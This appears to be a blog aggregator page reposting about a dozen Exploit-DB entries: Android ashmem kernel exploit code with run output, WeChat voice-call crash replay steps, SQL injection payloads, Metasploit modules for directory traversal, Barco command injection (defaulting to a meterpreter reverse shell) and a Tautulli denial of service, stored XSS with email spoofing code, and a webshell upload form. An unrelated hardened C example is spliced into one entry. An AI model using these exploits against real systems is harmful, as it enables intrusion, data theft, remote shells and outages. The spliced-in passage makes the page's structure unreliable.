All posts by ISHACK AI BOT

  1. This bug report describes two ways in which an attacker can modify the contents of a read-only ashmem fd. I'm not sure at this point what the most interesting user of ashmem is in the current Android release, but there are various users, including Chrome and a bunch of utility classes. In AOSP master, there is even code in <https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc> that uses ashmem for some JIT zygote mapping, which sounds extremely interesting.

     Android's ashmem kernel driver has an ->mmap() handler that attempts to lock down created VMAs based on a configured protection mask such that in particular write access to the underlying shmem file can never be gained. It tries to do this as follows (code taken from upstream Linux drivers/staging/android/ashmem.c):

         static inline vm_flags_t calc_vm_may_flags(unsigned long prot)
         {
             return _calc_vm_trans(prot, PROT_READ,  VM_MAYREAD) |
                    _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |
                    _calc_vm_trans(prot, PROT_EXEC,  VM_MAYEXEC);
         }
         [...]
         static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)
         {
             struct ashmem_area *asma = file->private_data;
             [...]
             /* requested protection bits must match our allowed protection mask */
             if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &
                 calc_vm_prot_bits(PROT_MASK, 0)) {
                 ret = -EPERM;
                 goto out;
             }
             vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);
             [...]
             if (vma->vm_file)
                 fput(vma->vm_file);
             vma->vm_file = asma->file;
             [...]
             return ret;
         }

     This ensures that the protection flags specified by the caller don't conflict with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent the user from afterwards adding new protection flags via mprotect(). However, it improperly stores the backing shmem file, whose ->mmap() handler does not enforce the same restrictions, in ->vm_file.

     An attacker can abuse this through the remap_file_pages() syscall, which grabs the file pointer of an existing VMA and calls its ->mmap() handler to create a new VMA. In effect, calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write access to the ashmem allocation's backing file via mprotect().

     Reproducer (works both on Linux from upstream master in an X86 VM and on a Pixel 2 at security patch level 2019-09-05 via adb):

     ====================================================================
     user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c

         #include <unistd.h>
         #include <stdlib.h>
         #include <fcntl.h>
         #include <err.h>
         #include <stdio.h>
         #include <sys/mman.h>
         #include <sys/ioctl.h>
         #include <sys/wait.h>

         #define __ASHMEMIOC 0x77
         #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
         #define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)

         int main(void) {
           int ashmem_fd = open("/dev/ashmem", O_RDWR);
           if (ashmem_fd == -1)
             err(1, "open ashmem");
           if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
             err(1, "ASHMEM_SET_SIZE");
           char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
           if (mapping == MAP_FAILED)
             err(1, "mmap ashmem");
           /* from here on, new mappings of the fd may only be read-only */
           if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
             err(1, "ASHMEM_SET_PROT_MASK");
           mapping[0] = 'A';
           printf("mapping[0] = '%c'\n", mapping[0]);

           /* hand the fd to the child as fd 42 */
           if (dup2(ashmem_fd, 42) != 42)
             err(1, "dup2");
           pid_t child = fork();
           if (child == -1)
             err(1, "fork");
           if (child == 0) {
             execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL);
             err(1, "execl");
           }
           int status;
           if (wait(&status) != child)
             err(1, "wait");

           printf("mapping[0] = '%c'\n", mapping[0]);
         }

     user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c

         #define _GNU_SOURCE
         #include <unistd.h>
         #include <sys/mman.h>
         #include <err.h>
         #include <stdlib.h>
         #include <stdio.h>

         int main(void) {
           int ashmem_fd = 42;

           /* sanity check: a writable mapping must be refused by ashmem_mmap() */
           char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
           if (write_mapping == MAP_FAILED) {
             perror("mmap ashmem writable failed as expected");
           } else {
             errx(1, "trivial mmap ashmem writable worked???");
           }

           char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);
           if (mapping == MAP_FAILED)
             err(1, "mmap ashmem readonly failed");
           /* VM_MAYWRITE was cleared, so mprotect() must fail here */
           if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)
             errx(1, "mprotect ashmem writable worked???");
           /* re-creates the VMA through the shmem file's ->mmap(), restoring VM_MAYWRITE */
           if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))
             err(1, "remap_file_pages");
           if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
             err(1, "mprotect ashmem writable failed, attack didn't work");
           mapping[0] = 'X';
           puts("attacker exiting");
         }

     user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c
     user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c
     user@vm:~/ashmem_remap$ ./ashmem_remap_victim
     mapping[0] = 'A'
     mmap ashmem writable failed as expected: Operation not permitted
     attacker exiting
     mapping[0] = 'X'
     user@vm:~/ashmem_remap$
     ====================================================================

     Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits it for 32-bit ARM applications:

         # b/36435222
         int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags) arm,x86,mips

     ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately, there is no access control for these - even if you only have read-only access to an ashmem file, you can still mark pages in it as purgable, causing them to effectively be zeroed out when the system is under memory pressure.

     Here's a simple test for that (to be run in an X86 Linux VM):

     ====================================================================
     user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c

         #include <unistd.h>
         #include <stdlib.h>
         #include <fcntl.h>
         #include <err.h>
         #include <stdio.h>
         #include <sys/mman.h>
         #include <sys/ioctl.h>
         #include <sys/wait.h>

         #define __ASHMEMIOC 0x77
         #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
         #define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)

         int main(void) {
           int ashmem_fd = open("/dev/ashmem", O_RDWR);
           if (ashmem_fd == -1)
             err(1, "open ashmem");
           if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
             err(1, "ASHMEM_SET_SIZE");
           char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
           if (mapping == MAP_FAILED)
             err(1, "mmap ashmem");
           if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
             err(1, "ASHMEM_SET_PROT_MASK");
           mapping[0] = 'A';
           printf("mapping[0] = '%c'\n", mapping[0]);

           if (dup2(ashmem_fd, 42) != 42)
             err(1, "dup2");
           pid_t child = fork();
           if (child == -1)
             err(1, "fork");
           if (child == 0) {
             execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL);
             err(1, "execl");
           }
           int status;
           if (wait(&status) != child)
             err(1, "wait");

           printf("mapping[0] = '%c'\n", mapping[0]);
         }

     user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c

         #include <unistd.h>
         #include <stdlib.h>
         #include <fcntl.h>
         #include <err.h>
         #include <stdio.h>
         #include <sys/mman.h>
         #include <sys/ioctl.h>

         struct ashmem_pin {
           unsigned int offset, len;
         };

         #define __ASHMEMIOC 0x77
         #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
         #define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)

         int main(void) {
           /* offset 0, len 0 means "the whole region" */
           struct ashmem_pin pin = { 0, 0 };
           /* no access check: works on the read-only fd inherited from the victim */
           if (ioctl(42, ASHMEM_UNPIN, &pin))
             err(1, "unpin 42");

           /* ensure that shrinker doesn't get skipped */
           int ashmem_fd = open("/dev/ashmem", O_RDWR);
           if (ashmem_fd == -1)
             err(1, "open ashmem");
           if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))
             err(1, "ASHMEM_SET_SIZE");
           char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
           if (mapping == MAP_FAILED)
             err(1, "mmap ashmem");
           if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))
             err(1, "unpin own fd");

           /* simulate OOM */
           system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'");

           puts("attacker exiting");
         }

     user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c
     user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c
     user@vm:~/ashmem_purging$ ./ashmem_purge_victim
     mapping[0] = 'A'
     attacker exiting
     mapping[0] = ''
     user@vm:~/ashmem_purging$
     ====================================================================
  2. There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy.

     To reproduce the bug:

     1) install and run frida on the caller Android device and a desktop host (https://www.frida.re)
     2) copy the files in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists
     3) run "setenforce 0" on the caller device
     4) extract replay.py and replay.js into the same directory on a desktop host and run:

            python3 replay.py DEVICENAME

        Wait for the word "READY" to display. If you don't know your device name, you can list device names by running:

            python3 replay.py

     5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds.

     A crash log is attached.

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47920.zip
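The length-handling defect described in the report, modelled beside a hardened version, as an added example (not WeChat's code; the function names, the fixed-size jitter-buffer slot and the sample packets are hypothetical constructions of what the report describes). The buggy path strips the 12-byte RTP fixed header without a minimum-length check and then applies the signed `n < 300` bound, so a negative length passes; the hardened path validates the header before subtracting and keeps sizes unsigned with both a lower and an upper bound.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RTP_FIXED_HEADER_LEN 12   /* RTP fixed header: V/P/X/CC, M/PT, seq, ts, SSRC */
#define JBM_FRAME_MAX        300  /* the buffer bound the report cites (n < 300) */

/* --- Model of the reported bug (hypothetical names, not WeChat's code) --- */

/* Strips the fixed header and returns the remaining length as a signed int
 * without checking that len >= 12: a 5-byte packet yields -7. */
static int unpacket_rtp_buggy(const uint8_t *pkt, int len, const uint8_t **payload)
{
    *payload = pkt + RTP_FIXED_HEADER_LEN;
    return len - RTP_FIXED_HEADER_LEN;
}

/* The consumer's bound as described: a signed comparison, so any negative
 * length passes and would reach memcpy() converted to a huge size_t. */
static bool jbm_accepts_buggy(int n)
{
    return n < JBM_FRAME_MAX;
}

/* --- Hardened version --- */

/* Validates the RTP header before computing the payload length; sizes stay
 * unsigned so no underflow is possible. Also accounts for CSRC entries
 * (4 bytes each, count in the low 4 bits of byte 0), which a fixed 12-byte
 * strip ignores. Returns false for anything that cannot be a valid packet. */
static bool unpacket_rtp_safe(const uint8_t *pkt, size_t len,
                              const uint8_t **payload, size_t *payload_len)
{
    if (pkt == NULL || len < RTP_FIXED_HEADER_LEN)
        return false;
    if ((pkt[0] >> 6) != 2)                 /* RTP version must be 2 */
        return false;
    size_t header_len = RTP_FIXED_HEADER_LEN + 4u * (pkt[0] & 0x0f);
    if (len < header_len)                   /* CSRC list would run past the packet */
        return false;
    *payload = pkt + header_len;
    *payload_len = len - header_len;
    return true;
}

/* Copies an audio frame into a fixed jitter-buffer slot only if the payload
 * length is non-empty and strictly below the slot size. Returns the number of
 * bytes copied, or -1 if the packet was rejected. */
static int jbm_input_frame_safe(uint8_t frame[JBM_FRAME_MAX],
                                const uint8_t *pkt, size_t len)
{
    const uint8_t *payload;
    size_t payload_len;
    if (!unpacket_rtp_safe(pkt, len, &payload, &payload_len))
        return -1;
    if (payload_len == 0 || payload_len >= JBM_FRAME_MAX)
        return -1;
    memcpy(frame, payload, payload_len);
    return (int)payload_len;
}

/* Builds a constructed RTP packet: version 2, no CSRCs, payload filled with 'a'.
 * Returns the total packet length written into buf (0 if buf is too small). */
static size_t build_test_packet(uint8_t *buf, size_t buf_len, size_t payload_len)
{
    if (buf_len < RTP_FIXED_HEADER_LEN + payload_len)
        return 0;
    memset(buf, 0, RTP_FIXED_HEADER_LEN);
    buf[0] = 0x80;                          /* V=2, P=0, X=0, CC=0 */
    memset(buf + RTP_FIXED_HEADER_LEN, 'a', payload_len);
    return RTP_FIXED_HEADER_LEN + payload_len;
}

int main(void)
{
    uint8_t pkt[512], frame[JBM_FRAME_MAX];
    const uint8_t *payload;

    /* Constructed 5-byte truncated packet: the buggy path goes negative and
     * still passes the n < 300 check; the hardened path rejects it. */
    uint8_t runt[5] = { 0x80, 0, 0, 0, 0 };
    int n = unpacket_rtp_buggy(runt, sizeof runt, &payload);
    printf("buggy: len=%d accepted=%d\n", n, jbm_accepts_buggy(n));
    printf("safe : copied=%d\n", jbm_input_frame_safe(frame, runt, sizeof runt));

    /* Constructed well-formed packet with a 160-byte payload. */
    size_t len = build_test_packet(pkt, sizeof pkt, 160);
    printf("safe : copied=%d\n", jbm_input_frame_safe(frame, pkt, len));
    return 0;
}
```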
  3. # Exploit Title: Online Book Store 1.0 - 'bookisbn' SQL Injection
     # Google Dork: N/A
     # Date: 2020-01-15
     # Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)
     # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
     # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
     # Version: 1.0
     # Tested on: Ubuntu 16.04
     # CVE: N/A

     -------------- Vulnerable code in book.php ( Line 1-25) -----------------------------------------------

         $book_isbn = $_GET['bookisbn']; // vulnerable param
         // connect to database
         require_once "./functions/database_functions.php";
         $conn = db_connect();
         $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point
         $result = mysqli_query($conn, $query);
         if(!$result){
             echo "Can't retrieve data " . mysqli_error($conn);
             exit;
         }
         $row = mysqli_fetch_assoc($result);
         if(!$row){
             echo "Empty book";
             exit;
         }
         $title = $row['book_title'];
         require "./template/header.php";
         ?>
         <!-- Example row of columns -->
         <p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p>
         // results go here

     -------------------------------------------------------------------------------------------------------------------

     Exploit POC :

     # Parameter: bookisbn (GET)
     # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
     # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
     # Payload: http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp

     -----------------------

     Other Vulnerable Pages with Same vulnerability :

     [PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
     [PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
     [PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
     and other pages .... :)

     Also you can have more fun with Other XSS bugs too :)
     ----
  4. ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # web site for more information on licensing and terms of use.
     ##

         class MetasploitModule < Msf::Auxiliary
           include Msf::Exploit::Remote::HttpClient

           def initialize
             super(
               'Name' => 'Huawei HG255 Directory Traversal',
               'Description' => 'Server Directory Traversal at Huawei HG255 by malicious GET requests',
               'Author' => 'Ismail Tasdelen',
               'License' => MSF_LICENSE,
               'References' =>
                 [
                   ['CVE', '2017-17309' ],
                   ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
                 ]
             )
             register_options(
               [
                 Opt::RPORT(80)
               ], self.class
             )
           end

           def run
             urllist=[
               '/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
               '/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
               '/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
               '/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd']

             urllist.each do |url|
               begin
                 res = send_request_raw(
                   {
                     'method'=> 'GET',
                     'uri'=> url
                   })
                 if res
                   print_good("Vulnerable! for #{url}")
                 else
                   print_status("Vulnerable(no response) detected for #{url}")
                 end
               rescue Errno::ECONNRESET
                 print_status("Vulnerable(rst) detected for #{url}")
               rescue Exception
                 print_error("Connection failed.")
               end
             end
           end
         end
  5. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

         class MetasploitModule < Msf::Exploit::Remote
           Rank = ExcellentRanking

           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::CmdStager

           def initialize(info = {})
             super(update_info(info,
               'Name' => "Barco WePresent file_transfer.cgi Command Injection",
               'Description' => %q(
                 This module exploits an unauthenticated remote command injection
                 vulnerability found in Barco WePresent and related OEM'ed products.
                 The vulnerability is triggered via an HTTP POST request to the
                 file_transfer.cgi endpoint.
               ),
               'License' => MSF_LICENSE,
               'Author' => 'Jacob Baines', # @Junior_Baines'
               'References' => [
                 ['CVE', '2019-3929'],
                 ['EDB', '46786'],
                 ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
               ],
               'DisclosureDate' => "Apr 30, 2019",
               'Platform' => ['unix', 'linux'],
               'Arch' => [ARCH_CMD, ARCH_ARMLE],
               'Privileged' => false,
               'Targets' => [
                 ['Unix In-Memory',
                   'Platform' => 'unix',
                   'Arch' => ARCH_CMD,
                   'Type' => :unix_memory,
                   'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' } }],
                 ['Linux Dropper',
                   'Platform' => 'linux',
                   'Arch' => ARCH_ARMLE,
                   'CmdStagerFlavor' => ['printf', 'wget'],
                   'Type' => :linux_dropper]
               ],
               'DefaultTarget' => 1,
               'DefaultOptions' => {
                 'SSL' => true,
                 'RPORT' => 443,
                 'CMDSTAGER::FLAVOR' => 'printf',
                 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
               }))
           end

           def filter_bad_chars(cmd)
             cmd.gsub!(/;/, 'Pa_Note')
             cmd.gsub!(/\+/, 'Pa_Add')
             cmd.gsub!(/&/, 'Pa_Amp')
             return cmd
           end

           def send_command(cmd, timeout)
             vars_post = {
               file_transfer: 'new',
               dir: "'#{filter_bad_chars(cmd)}'"
             }

             send_request_cgi({
               'uri' => '/cgi-bin/file_transfer.cgi',
               'method' => 'POST',
               'vars_post' => vars_post
             }, timeout)
           end

           def check
             check_resp = send_command(";whoami;", 5)
             unless check_resp
               return CheckCode::Unknown('Connection failed.')
             end

             if check_resp.code == 200
               check_resp.body.gsub!(/[\r\n]/, "")
               if check_resp.body == "root"
                 return CheckCode::Vulnerable
               end
             end

             CheckCode::Safe
           end

           def execute_command(cmd, _opts = {})
             send_command(";(#{cmd})&", nil)
           end

           def exploit
             case target['Type']
             when :unix_memory
               execute_command(payload.encoded)
             when :linux_dropper
               execute_cmdstager(linemax: 128)
             end
           end
         end
  6. # Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
     # Google Dork: inurl:/wp-content/plugins/postie/readme.txt
     # Date: 2020-01-15
     # Exploit Author: V1n1v131r4
     # Vendor Homepage: https://postieplugin.com/
     # Software Link: https://wordpress.org/plugins/postie/#developers
     # Version: <=1.9.40
     # Tested on: Linux
     # CVE : CVE-2019-20203, CVE-2019-20204

     ## Identifying WordPress Postie Plugin installation

         #!/bin/bash
         if curl -s -o /dev/null -w "%{http_code}" http://<domain.com>/wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then
             echo ""
             echo "Postie installed!"
         else
             echo ""
             echo "Postie seems not to be installed"
         fi

     ## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204)

     # the syntax below should go as email body

         jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(You've been hacked)//'>

     ## Email to post on Postie

     - Identifying the mail server

         dig domain.com mx

     - enumerating accounts via SMTP

         telnet domain.com 587
         EHLO buddy
         mail from:<[email protected]>
         rcpt to:<[email protected]>
         vrfy [email protected]

     - listing accounts via third party software

     You can use these third party software and APIs to enumerate target email users:
     - https://www.zerobounce.net
     - https://tools.verifyemailaddress.io/
     - https://hunter.io/email-verifier

     ## Spoofing with PHPMailer

         <?php
         /* CONFIGURE PHP IF NEEDED */
         // ini_set("sendmail_from","$fromFull");
         // ini_set("SMTP","mail.domain.com");
         // ini_set('smtp_port',587);
         // ini_set('username',"user");
         // ini_set('password',"pass");

         // COMPOSE
         $to = '[email protected]';
         $subject = 'Title of your post';
         $message = "You've been hacked :-)";

         // BASIC HEADER
         $headers = 'From: [email protected]' . "\r\n" .
             'Reply-To: [email protected]' . "\r\n" .
             'X-Mailer: PHP/' . phpversion();

         // SEND AND SHOW MESSAGE
         if (mail($to, $subject, $message, $headers))
             echo $headers.'<h1>Mail sent!</h1>';
         else
             echo '<h1>Something went wrong...</h1>';

         // FULL HEADER
         // $headers = "From: testsite < [email protected] >\n";
         // $headers .= "Cc: testsite < [email protected] >\n";
         // $headers .= "X-Sender: testsite < [email protected] >\n";
         // $headers .= 'X-Mailer: PHP/' . phpversion();
         // $headers .= "X-Priority: 1\n";
         // $headers .= "Return-Path: [email protected]\n";
         // $headers .= "MIME-Version: 1.0\r\n";
         // $headers .= "Content-Type: text/html; charset=iso-8859-1\n";
         ?>
  7. # Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
     # Exploit Author: Ai Ho
     # Vendor Homepage : https://jenkins.io/
     # Effective version : Gitlab Hook Plugin 1.4.2 and earlier
     # References: https://jenkins.io/security/advisory/2020-01-15/
     # CVE: CVE-2020-2096
     # PoC: http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E
  8. # Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
     # Google Dork: N/A
     # Date: 2020-01-15
     # Blog: https://fatihhcelik.blogspot.com/
     # Exploit Author: Fatih Çelik
     # Vendor Homepage: https://www.rukovoditel.net/
     # Software Link: https://sourceforge.net/projects/rukovoditel/
     # Version: 2.5.2
     # Tested on: Kali Linux
     # CVE : N/A

     # Request,

         POST /ruko/index.php?module=items/listing HTTP/1.1
         Host: 127.0.0.1
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html, */*; q=0.01
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         X-Requested-With: XMLHttpRequest
         Content-Length: 330
         Connection: close
         Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver

         redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

     # PAYLOADS,

     # Parameter: reports_id (POST)
     # Type: boolean-based blind
     # Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
     Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

     # Type: error-based
     # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
     Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

     # Type: time-based blind
     # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
  9. # Exploit Title: Online Book Store 1.0 - Arbitrary File Upload
     # Google Dork: N/A
     # Date: 2020-01-16
     # Exploit Author: Or4nG.M4n aka S4udiExploit
     # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
     # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
     # Version: 1.0
     # Tested on: MY MIND v1.23.45
     # CVE: N/A

     # WWW . SEC4EVER . COM

     -> hola amigos ^.^
     -> just copy this html code

         <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
           <td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
           <td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
           <td><input type="file" name="image"></td>
           <input type="submit" name="save_change" value="Change" class="btn btn-primary">
         </form>

     -> after you upload your file you will find it here /store/bootstrap/img/[FILE].php

     # i think am back %^_^%
     # i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
     # big thanks to Stupid Coder ^.^
  10. ##
      # This module requires Metasploit: https://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

          class MetasploitModule < Msf::Auxiliary
            include Msf::Exploit::Remote::HttpClient

            def initialize
              super(
                'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
                'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
                'Author' => 'Ismail Tasdelen',
                'License' => MSF_LICENSE,
                'References' =>
                  [
                    ['CVE', '2019-19833'],
                    ['EDB', '47785']
                  ]
              )
              register_options([ Opt::RPORT(8181) ])
            end

            def run
              res = send_request_raw({
                'method' => 'GET',
                'uri' => '/shutdown'
              })
              if res
                print_status("Request sent to #{rhost}")
              else
                print_status("No reply from #{rhost}")
              end
            rescue Errno::ECONNRESET
              print_status('Connection reset')
            end
          end
  11. # Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
      # Date: 2019-12-17
      # CVE: CVE-2019-19781
      # Vulnerability: Path Traversal
      # Vulnerability Discovery: Mikhail Klyuchnikov
      # Exploit Author: Dhiraj Mishra
      # Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
      # Vendor Homepage: https://www.citrix.com/
      # References: https://support.citrix.com/article/CTX267027
      # https://github.com/nmap/nmap/pull/1893

          local http = require "http"
          local stdnse = require "stdnse"
          local shortport = require "shortport"
          local table = require "table"
          local string = require "string"
          local vulns = require "vulns"
          local nmap = require "nmap"
          local io = require "io"

          description = [[
          This NSE script checks whether the target server is vulnerable to CVE-2019-19781
          ]]
          ---
          -- @usage
          -- nmap --script https-citrix-path-traversal -p <port> <host>
          -- nmap --script https-citrix-path-traversal -p <port> <host> --script-args output='file.txt'
          -- @output
          -- PORT    STATE SERVICE
          -- 443/tcp open  http
          -- | CVE-2019-19781:
          -- |   Host is vulnerable to CVE-2019-19781
          -- @changelog
          -- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
          -- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
          -- @xmloutput
          -- <table key="NMAP-1">
          -- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
          -- <elem key="state">VULNERABLE</elem>
          -- <table key="description">
          -- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to an unauthenticated path
          -- traversal vulnerability that allows attackers to read configurations or any other file.
